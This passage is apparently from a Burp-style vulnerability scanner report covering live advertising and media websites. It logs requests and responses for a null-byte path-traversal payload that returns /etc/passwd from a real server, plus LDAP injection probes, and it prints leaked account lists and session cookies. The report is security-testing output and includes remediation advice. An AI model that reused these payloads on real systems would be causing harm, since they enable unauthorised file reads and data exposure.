Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 14:57:02 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n29 ( iad-agg-n18), ms iad-agg-n18 ( origin>CONN)
Cache-Control: max-age=300
Expires: Wed, 11 May 2011 15:02:02 GMT
Age: 0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 1745

document.write("<ul><li># $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $\n#\nroot:*:0:0:Charlie &:/root:/bin/csh\ntoor:*:0:0:Bourne-again Superuser:/root:\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System &:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin\nkmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin\ngames:*:7:13:Games pseudo-user:/usr/games:/usr/sb
...[SNIP]...
:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico\npop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin\nwww:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin\nnobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin\n\ncklewin:*:100:100:Christopher Klewin -Sysadmin:/home/cklewin:/usr/local/bin/bash\npcartier:*:101:101:Paul Cartier -Staff:/home/pcartier
...[SNIP]...

2.3. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [mName parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.glam.com
Path:   /app/site/affiliate/viewChannelModule.act

Issue detail

The mName parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload viewAdJs../../../../../../../../etc/passwd%00viewAdJs was submitted in the mName parameter. The requested file was returned in the application's response.

Request

GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs../../../../../../../../etc/passwd%00viewAdJs&affiliateId=8156650&adSize=970x66 HTTP/1.1
Host: www2.glam.com
Proxy-Connection: keep-alive
Referer: http://www.shefinds.com/2011/cannes-film-festival-begins-today-time-to-reflect-on-last-years-best-dressed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1304359345.1304361407.4; ctags=%3bct%3dbarhp

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Cache-Control: max-age=3600
Date: Wed, 11 May 2011 14:56:14 GMT
Connection: close
Content-Length: 2009

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdow
...[SNIP]...
ucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwa
...[SNIP]...

3. LDAP injection
There are 4 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


3.1. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The pid parameter appears to be vulnerable to LDAP injection attacks.

The payloads 3781f7a06b07f536)(sn=* and 3781f7a06b07f536)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /bmx3/broker.pli?pid=3781f7a06b07f536)(sn=*&PRAd=253735206&AR_C=181106363 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=46&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 14:19:04 2011&prad=253735207&arc=194941163&; UID=875e3f1e-184.84.247.65-1303349046

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 11 May 2011 15:13:07 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_3781f7a06b07f536&#41;&#40;sn=exp=1&initExp=Wed May 11 15:13:07 2011&recExp=Wed May 11 15:13:07 2011&prad=253735206&arc=181106363&; expires=Tue 09-Aug-2011 15:13:07 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305126787; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

Request 2

GET /bmx3/broker.pli?pid=3781f7a06b07f536)!(sn=*&PRAd=253735206&AR_C=181106363 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=46&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 14:19:04 2011&prad=253735207&arc=194941163&; UID=875e3f1e-184.84.247.65-1303349046

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 11 May 2011 15:13:07 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_3781f7a06b07f536&#41;!&#40;sn=exp=1&initExp=Wed May 11 15:13:07 2011&recExp=Wed May 11 15:13:07 2011&prad=253735206&arc=181106363&; expires=Tue 09-Aug-2011 15:13:07 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305126787; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

3.2. http://cspix.media6degrees.com/orbserv/hbpix [rdrlst cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The rdrlst cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the rdrlst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.medicinenet.com%2fpink_eye%2farticle.htm HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt117s3uxzt1tr37xzt1tr37xzt117s3uxzt117rw8; adh=1lkkxr8160a4ka20103r018twhJPTGt00gg5452rf011et018qzlZAsw500gg2f52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh17san01o3n070k0r51a; rdrlst=*)(sn=*; sglst=2280sbpelkxlm5026sw00f3m000k00500dsnlkxlm503s3e00q3n070k0q50qarllkxlm503s3e00q3n070k0q50qcg5lkxlm5026sw00q3n070k0q50q9rslkkpke0go550183n070k0r518am5lkkxr8002zw0113n070k0r511cd4lkxlm5026sw00f3m000k00500crglkxlm5026sw00q3n070k0q50qcnolkxlm5026sw00q3n070k0q50qabelkxlm5026sw00q3n070k0q50qdd8lkxlm5026sw00f3m000k00500cy2lkxlm5026sw00q3n070k0q50qaoplkb5u209jqc0063e000j00500cnxlkxlm503s3e00q3n070k0q50qe3qll1dpj000000033n030k03503bq3lkxlm5026sw00q3n070k0q50qbvplkxlm5026sw00f3m000k00500aoilkxlm503s3e00n3n000k00500942lkb5u20mfs300o3l000k005008ndlkb5u20mfs300o3l000k005009ullkxlm503s3e00n3n000k00500bvclkxlm5026sw00q3n070k0q50qc5flkxlm5026sw00q3n070k0q50q56blkb5u20mfs300o3l000k00500bjqlkxlm5026sw00q3n070k0q50qawklkxlm5026sw00q3n070k0q50qasulkb5u209jqc0063e000j00500crplkxlm503s3e00n3n000k00500asqlkxlm5026sw00q3n070k0q50qc5rlkov6e0000000t3n070k0r50taw8lkxlm503s3e00q3n070k0q50qc60lkxlm5026sw00q3n070k0q50qdc4lkxlm5026sw00q3n070k0q50qd26lkxlm5026sw00q3n070k0q50qdnjlkxlm503s3e00q3n070k0q50qcbclkxlm5026sw00q3n070k0q50qc85lkxlm5026sw00q3n070k0q50qcsslkxlm503s3e00q3n070k0q50qc80lkb5u209jqc0063e000j00500ag2lkd7nq0o68m01d3n070k0r51ac1elkxlm5026sw00q3n070k0q50qc81lkkpke0cw1r00i3l000k005009grlkxlm5026sw00q3n070k0q50qc8flkxlm5026sw00q3n070k0q50qa6slkkpke0cw1r00i3l000k00500dnalkxlm5026sw00q3n070k0q50q9z6lkxlm5026sw00q3n070k0q50qdbtlkxlm5026sw00q3n070k0q50q9q4lkxlm5026sw00q3n070k0q50qdyllkxlm5026sw00q3n070k0q50q0kllklhm40c4010053l000k005009
q5lkb5u20mfs300o3l000k00500b3zlkxlm503s3e00n3n000k005000t7ljyxb412gl801l3n070k0r51adgflkkpke0f2un0183n070k0r5189mjlkxlm5026sw00f3m000k00500bo0lkb5u20q7vh01b3n000k00500bo1lkkyy00cmo50093l000k005009pglkxlm5026sw00q3n070k0q50qcwalkxlm5026sw00q3n070k0q50qd86lklhm40c4010053l000k00500d84lkxlm5026sw00q3n070k0q50qdqllkxlm5026sw00q3n070k0q50qdz3lkxlm5026sw00f3m000k00500cm6lkxlm5026sw00q3n070k0q50qcxdlkxlm503s3e00q3n070k0q50q719lkb5u20omkz00w3n070k0q50r71alkkpke0cw1r00i3l000k00500ctplkxlm5026sw00q3n070k0q50qcc3lkxlm5026sw00q3n070k0q50qdgilkb5u209jqc0063e000j00500cthlkxlm5026sw00q3n070k0q50q4wclkb5u20q7vh00t3n000k005005mrlkb5u20mfs300o3l000k00500a0ulkxlm503s3e00n3n000k00500arilkxlm5026sw00f3m000k00500e0yll1dpj000000033n030k03503bwjlkkyy00gerj00z3n070k0r50zcbplkxlm5026sw00q3n070k0q50q9gelkxlm503s3e00n3n000k00500; vstcnt=...[SNIP]...

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=016020a0e0f0g0h1ljtllpxzt117vbjxzt1tr37xzt1tr37xzt117vbjxzt117rw8; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 16:10:21 GMT; Path=/
Set-Cookie: adh="1lkkxr8160a4ka20103r018twhJPTGt00gg5452rf011et018qzlZAsw500gg2f52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh17vbj01p3n080k0s51b; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 16:10:21 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=40110tell1gx8000000013n01; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 16:10:21 GMT; Path=/
Set-Cookie: sglst=...[SNIP]...
...[SNIP]...

Request 2

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.medicinenet.com%2fpink_eye%2farticle.htm HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt117s3uxzt1tr37xzt1tr37xzt117s3uxzt117rw8; adh=1lkkxr8160a4ka20103r018twhJPTGt00gg5452rf011et018qzlZAsw500gg2f52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh17san01o3n070k0r51a; rdrlst=*)!(sn=*; sglst=2280sbpelkxlm5026sw00f3m000k00500dsnlkxlm503s3e00q3n070k0q50qarllkxlm503s3e00q3n070k0q50qcg5lkxlm5026sw00q3n070k0q50q9rslkkpke0go550183n070k0r518am5lkkxr8002zw0113n070k0r511cd4lkxlm5026sw00f3m000k00500crglkxlm5026sw00q3n070k0q50qcnolkxlm5026sw00q3n070k0q50qabelkxlm5026sw00q3n070k0q50qdd8lkxlm5026sw00f3m000k00500cy2lkxlm5026sw00q3n070k0q50qaoplkb5u209jqc0063e000j00500cnxlkxlm503s3e00q3n070k0q50qe3qll1dpj000000033n030k03503bq3lkxlm5026sw00q3n070k0q50qbvplkxlm5026sw00f3m000k00500aoilkxlm503s3e00n3n000k00500942lkb5u20mfs300o3l000k005008ndlkb5u20mfs300o3l000k005009ullkxlm503s3e00n3n000k00500bvclkxlm5026sw00q3n070k0q50qc5flkxlm5026sw00q3n070k0q50q56blkb5u20mfs300o3l000k00500bjqlkxlm5026sw00q3n070k0q50qawklkxlm5026sw00q3n070k0q50qasulkb5u209jqc0063e000j00500crplkxlm503s3e00n3n000k00500asqlkxlm5026sw00q3n070k0q50qc5rlkov6e0000000t3n070k0r50taw8lkxlm503s3e00q3n070k0q50qc60lkxlm5026sw00q3n070k0q50qdc4lkxlm5026sw00q3n070k0q50qd26lkxlm5026sw00q3n070k0q50qdnjlkxlm503s3e00q3n070k0q50qcbclkxlm5026sw00q3n070k0q50qc85lkxlm5026sw00q3n070k0q50qcsslkxlm503s3e00q3n070k0q50qc80lkb5u209jqc0063e000j00500ag2lkd7nq0o68m01d3n070k0r51ac1elkxlm5026sw00q3n070k0q50qc81lkkpke0cw1r00i3l000k005009grlkxlm5026sw00q3n070k0q50qc8flkxlm5026sw00q3n070k0q50qa6slkkpke0cw1r00i3l000k00500dnalkxlm5026sw00q3n070k0q50q9z6lkxlm5026sw00q3n070k0q50qdbtlkxlm5026sw00q3n070k0q50q9q4lkxlm5026sw00q3n070k0q50qdyllkxlm5026sw00q3n070k0q50q0kllklhm40c4010053l000k00500
9q5lkb5u20mfs300o3l000k00500b3zlkxlm503s3e00n3n000k005000t7ljyxb412gl801l3n070k0r51adgflkkpke0f2un0183n070k0r5189mjlkxlm5026sw00f3m000k00500bo0lkb5u20q7vh01b3n000k00500bo1lkkyy00cmo50093l000k005009pglkxlm5026sw00q3n070k0q50qcwalkxlm5026sw00q3n070k0q50qd86lklhm40c4010053l000k00500d84lkxlm5026sw00q3n070k0q50qdqllkxlm5026sw00q3n070k0q50qdz3lkxlm5026sw00f3m000k00500cm6lkxlm5026sw00q3n070k0q50qcxdlkxlm503s3e00q3n070k0q50q719lkb5u20omkz00w3n070k0q50r71alkkpke0cw1r00i3l000k00500ctplkxlm5026sw00q3n070k0q50qcc3lkxlm5026sw00q3n070k0q50qdgilkb5u209jqc0063e000j00500cthlkxlm5026sw00q3n070k0q50q4wclkb5u20q7vh00t3n000k005005mrlkb5u20mfs300o3l000k00500a0ulkxlm503s3e00n3n000k00500arilkxlm5026sw00f3m000k00500e0yll1dpj000000033n030k03503bwjlkkyy00gerj00z3n070k0r50zcbplkxlm5026sw00q3n070k0q50q9gelkxlm503s3e00n3n000k00500; vstcnt=...[SNIP]...

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lkkxr8160a4ka20103r018twhJPTGt00gg5452rf011et018qzlZAsw500gg2f52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh17vbl01p3n080k0s51b; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 16:10:22 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=40110tell1gxa000000013n01; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 16:10:22 GMT; Path=/
Set-Cookie: sglst=...[SNIP]...
...[SNIP]...

3.3. http://data.cmcore.com/imp [ci parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://data.cmcore.com
Path:   /imp

Issue detail

The ci parameter appears to be vulnerable to LDAP injection attacks.

The payloads 1256ff2a1955010e)(sn=* and 1256ff2a1955010e)!(sn=* were each submitted in the ci parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /imp?tid=17&ci=1256ff2a1955010e)(sn=*&vn1=4.1.1&vn2=e4.0&ec=UTF-8&cm_mmc=IM_Display-_-x-_-x15off-_-postvday&cm_mmca1=300x250&cm_mmca2=300x250_8F_Interim_finalgif&cm_mmca3=postvday&cm_mmca4=25K&cvdone=s HTTP/1.1
Host: data.cmcore.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/ab?enc=AAAAAAAA-D9uEoPAyiH1PwAAAAAAAPg_bhKDwMoh9T8AAAAAAAD4PzGYU0zCzH1PSsYda6b2ziVcpMpNAAAAAAkOAAA4AAAAZAEAAAIAAABT_gQAd2MAAAEAAABVU0QAVVNEACwB-gBEIKsBSgQBAQUCAAQAAAAAuhw03wAAAAA.&tt_code=7681b4f5-7a3b-407a-961f-c43e051f5d06&udj=uf%28%27a%27%2C+10005%2C+1305125980%29%3Buf%28%27c%27%2C+47078%2C+1305125980%29%3Buf%28%27r%27%2C+327251%2C+1305125980%29%3Bppv%289163%2C+%275727959435961407537%27%2C+1305125980%2C+1305298780%2C+47078%2C+25463%29%3B&cnd=!Oh2hZAjm7wIQ0_wTGAAg98YBMAA4xEBAAEjkAlAAWABg2gFoAHBSePYtgAFUiAGOGJABAZgBAaABA6gBA7ABAbkBAAAAAAAA-D_BAQAAAAAAAPg_yQH-25QZ8rDSP9ABAA..&ccd=!yAWkMAjm7wIQ0_wTGPfGASAA&referrer=www.foxaudiencenetwork.com&custom_macro=ADV_CODE%5E17572%5ECP_CODE%5EH26G%5ECP_ID%5E47078%5ESEG_CODES%5EH26G-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=70091303843240316067555; TestSess3=x

Response 1

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:43:09 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 1256ff2a1955010e)(sn=*_login=130512858901678387301256ff2a1955010e)(sn=*; path=/
Set-Cookie: 1256ff2a1955010e)(sn=*_reset=1305128589;path=/
Expires: Tue, 10 May 2011 21:43:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

Request 2

GET /imp?tid=17&ci=1256ff2a1955010e)!(sn=*&vn1=4.1.1&vn2=e4.0&ec=UTF-8&cm_mmc=IM_Display-_-x-_-x15off-_-postvday&cm_mmca1=300x250&cm_mmca2=300x250_8F_Interim_finalgif&cm_mmca3=postvday&cm_mmca4=25K&cvdone=s HTTP/1.1
Host: data.cmcore.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/ab?enc=AAAAAAAA-D9uEoPAyiH1PwAAAAAAAPg_bhKDwMoh9T8AAAAAAAD4PzGYU0zCzH1PSsYda6b2ziVcpMpNAAAAAAkOAAA4AAAAZAEAAAIAAABT_gQAd2MAAAEAAABVU0QAVVNEACwB-gBEIKsBSgQBAQUCAAQAAAAAuhw03wAAAAA.&tt_code=7681b4f5-7a3b-407a-961f-c43e051f5d06&udj=uf%28%27a%27%2C+10005%2C+1305125980%29%3Buf%28%27c%27%2C+47078%2C+1305125980%29%3Buf%28%27r%27%2C+327251%2C+1305125980%29%3Bppv%289163%2C+%275727959435961407537%27%2C+1305125980%2C+1305298780%2C+47078%2C+25463%29%3B&cnd=!Oh2hZAjm7wIQ0_wTGAAg98YBMAA4xEBAAEjkAlAAWABg2gFoAHBSePYtgAFUiAGOGJABAZgBAaABA6gBA7ABAbkBAAAAAAAA-D_BAQAAAAAAAPg_yQH-25QZ8rDSP9ABAA..&ccd=!yAWkMAjm7wIQ0_wTGPfGASAA&referrer=www.foxaudiencenetwork.com&custom_macro=ADV_CODE%5E17572%5ECP_CODE%5EH26G%5ECP_ID%5E47078%5ESEG_CODES%5EH26G-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=70091303843240316067555; TestSess3=x

Response 2

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:43:09 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 1256ff2a1955010e)!(sn=*_login=130512858900671754341256ff2a1955010e)!(sn=*; path=/
Set-Cookie: 1256ff2a1955010e)!(sn=*_reset=1305128589;path=/
Expires: Tue, 10 May 2011 21:43:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

3.4. http://oascentral.blogher.org/RealMedia/ads/adstream_jx.ads/blogher.org.parenting.mybeautifulday/2011/05/pink-eye-html/@Middle,Left!Middle [OAX cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://oascentral.blogher.org
